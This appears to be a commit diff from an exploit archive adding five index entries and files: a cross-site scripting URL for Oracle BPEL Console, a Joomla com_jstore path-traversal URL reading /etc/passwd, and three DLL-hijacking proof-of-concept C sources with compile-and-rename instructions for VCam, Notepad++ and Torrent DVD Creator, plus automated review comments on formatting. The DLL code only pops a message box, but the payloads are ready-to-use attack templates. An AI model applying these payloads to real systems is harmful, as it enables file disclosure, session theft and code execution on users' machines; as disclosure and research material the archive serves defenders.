Updated 10_03_2014

Offensive Security 2014-10-03 04:45:15 +00:00
parent 2a66404f6b
commit 8e5a9aa87e
6 changed files with 195 additions and 0 deletions


@ -31362,3 +31362,8 @@ id,file,description,date,author,platform,type,port
34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0 34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0
34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 BPEL Console Cross Site Scripting Vulnerability",2010-10-12,"Alexander Polyakov",jsp,webapps,0
34835,platforms/windows/remote/34835.py,"e2eSoft VCam DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
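
Review bot: rows 34835 and 34836 register their files as `platforms/windows/remote/34835.py` and `platforms/windows/remote/34836.py`, but the bodies added for those two entries in this commit are C source for a DLL (`#include "stdafx.h"`, `DllMain`), the same shape as 34838, which is listed as `.c`. Rename the two files to `.c` and update the paths in these rows so that anything keying on the extension does not treat them as Python. The DLL-loading rows are also typed `remote` with port `0` although their descriptions depend on a user opening a file from a network share; confirm that classification is the intended one.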

platforms/jsp/webapps/34834.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/43954/info
Oracle Fusion Middleware is prone to a cross-site scripting vulnerability in BPEL Console.
The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Valid Session' privileges.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Oracle BPEL Console 10.1.3.3.0 is vulnerable.
http://www.example.com:7777/BPELConsole/default/processLog.jsp?processId=*&revisionTag=*&processName=ssssssssssssssssssss"><script>alert()</script>&eventType=all&eventDate=all
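
Review bot: `platforms/jsp/webapps/34834.txt` is added as an executable file, yet it holds only advisory text and a URL, so it should be committed with a non-executable mode. The description also never names the affected parameter, which the sample URL shows to be `processName` on `processLog.jsp`; stating it in the text would let readers match the entry against the output-encoding fix for that page.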


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44053/info
The 'com_jstore' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
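
Review bot: the description says the component "fails to properly sanitize user-supplied input" without naming the input or any affected version. The sample URL and the index title both point at the `controller` parameter, so name it in the text, and add a version line (or state that the affected versions are unknown) as the 34834 and 34836 entries do.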


@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/44051/info
e2eSoft VCam is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
===================================================
e2eSoft VCam DLL Hijacking Exploit (ippopencv100.dll & ippcv-6.1.dll )
===================================================
/*
#e2eSoft VCam DLL Hijacking Exploit (ippopencv100.dll & ippcv-6.1.dll )
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software : http://www.e2esoft.cn/vcam/
#Tested on: Windows? XP sp3
#Home : www.Dev-PoinT.com
==========================
How TO use : Compile and rename to ippopencv100.dll & ippcv-6.1.dll , create a file in the same dir with one of the following extensions.
check the result > Hack3d
==========================
# ippopencv100.dll & ippcv-6.1.dll(code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
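
Review bot: the source reference, the two description sentences and the `====` banner sit before the opening `/*`, so the file as stored is neither a plain advisory nor valid C, and the index lists it under a third format (`.py`). Move the prose inside the comment block, or keep the advisory text in a separate `.txt`, so the entry has one consistent format. The banner title is also repeated verbatim as the first line of the comment, and one copy can be dropped.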


@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/44052/info
Notepad++ is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Notepad++ 5.8.2 is vulnerable; other versions may also be affected.
/*
#Notepad++ 5.8.2 DLL Hijacking Exploit (libtidy.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software : http://notepad-plus-plus.org/
#Tested on: Windows? XP sp3
#Home : www.Dev-PoinT.com
==========================
How TO use : Compile and rename to libtidy.dll , create a file in the same dir with one of the following extensions.
check the result > Hack3d
==========================
# libtidy.dll(code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
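
Review bot: `#Tested on: Windows? XP sp3` carries a `?` where a non-ASCII character was lost in conversion; normalise the header to plain ASCII ("Windows XP SP3") so the tested platform is unambiguous. In `init()`, the literal `0x00000003` passed to `MessageBox` is a magic number; the named constant `MB_YESNOCANCEL` says the same thing and reads more clearly in review.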


@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/44054/info
Torrent DVD Creator is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
/*
#Torrent DVD Creator DLL Hijacking Exploit (quserex.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software : http://www.torrentrockyou.com
#Tested on: Windows. XP sp3
#Home : www.Dev-PoinT.com
==========================
How TO use : Compile and rename to quserex.dll , create a file in the same dir with one of the following extensions.
check the result > Hack3d
==========================
# quserex.dll(code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
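
Review bot: the description gives no affected version of Torrent DVD Creator, whereas the Notepad++ entry in this same commit states "5.8.2 is vulnerable"; add the tested version or say explicitly that it is unknown, since defenders cannot scope exposure from the product name alone. The `DllMain` and `init()` bodies are also identical to the other two DLL entries apart from the strings, and the `Windows. XP sp3` header shows the same lost character as the `Windows? XP sp3` lines there; the three headers should be cleaned up consistently.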